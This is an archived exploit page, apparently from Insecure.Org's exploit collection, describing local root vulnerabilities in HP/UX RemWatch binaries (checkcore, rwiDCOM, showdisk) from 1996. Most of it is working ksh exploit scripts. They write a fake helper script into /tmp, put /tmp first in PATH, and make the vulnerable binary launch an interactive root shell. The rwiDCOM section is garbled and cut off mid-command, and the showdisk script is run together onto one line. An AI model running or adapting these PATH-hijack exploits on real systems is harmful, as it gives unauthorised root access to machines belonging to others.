More SOD HP/UX RemWatch vulnerabilities

Summary
Description:A number of internal HP/UX RemWatch binaries, including checkcore, rwiDCOM, and showdisk are vulnerabile. Several exploits included
Author:SOD (sod@command.com.inter.net)
Compromise: root (local)
Vulnerable Systems:HP/UX with vulnerable RemWatch binaries, probably 9.x, 10.x
Date:6 November 1996 and earlier
Notes:See the SOD HP Bug of the Week page
Details

Exploit:

---exploit 1 checkcore
#!/bin/ksh

# SOD (as of 06/11/96)
# same sorta bug, different file.

if [ ! -x /usr/remwatch/bin/fmon/checkcore ]
then
  echo This is an exploit for the checkcore utility internal to
  echo HP\'s Remote Watch series of programs.
  echo The checkcore utility doesn\'t appear to be on your system.
  echo Moo
  exit
fi

PGM=$*

if [ -z "${PGM}" ]
then
  PROGGIE=`basename $0`
  echo "${PROGGIE}: I will run a shell for you"
  PGM="/bin/ksh -i"
fi

TTY=`tty`

echo '#!/bin/ksh' > /tmp/find
echo "${PGM} >> ${TTY} 2>&1" >> /tmp/find
chmod 777 /tmp/find
PATH=/tmp:$PATH
export PATH
/usr/remwatch/bin/fmon/checkcore > /dev/null 2>&1
rm /tmp/find

--exploit 2 rwiDCOM

An older problem with rwiDCOM -- do something like:

cat >/tmp/telnet <Datacomm Screen, and select
telnet to localhost.  It'll follow the new PATH straight into /tmp/telnet.

--exploit #3 showdisk #!/bin/ksh # remwatch showdisk exploit, before the patch # Silly-Scriptor/Salty, SOD # (as of 11Jun96) if [ ! -x /usr/remwatch/bin/disks/showdisk ] then echo This is an exploit for the showdisk utility internal to echo HP\'s Remote Watch series of programs. echo The showdisk utility doesn\'t appear to be on your system. echo Moo exit fi PGM=$* if [ -z "${PGM}" ] then PROGGIE=`basename $0` echo "${PROGGIE}: I will run a shell for you" PGM="/bin/ksh -i" fi TTY=`tty` echo '#!/bin/ksh' > /tmp/bdf echo "${PGM} >> ${TTY} 2>&1" >> /tmp/bdf chmod 777 /tmp/bdf PATH=/tmp:$PATH export PATH /usr/remwatch/bin/disks/showdisk arg arg /dev/null arg > /dev/null 2>&1

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]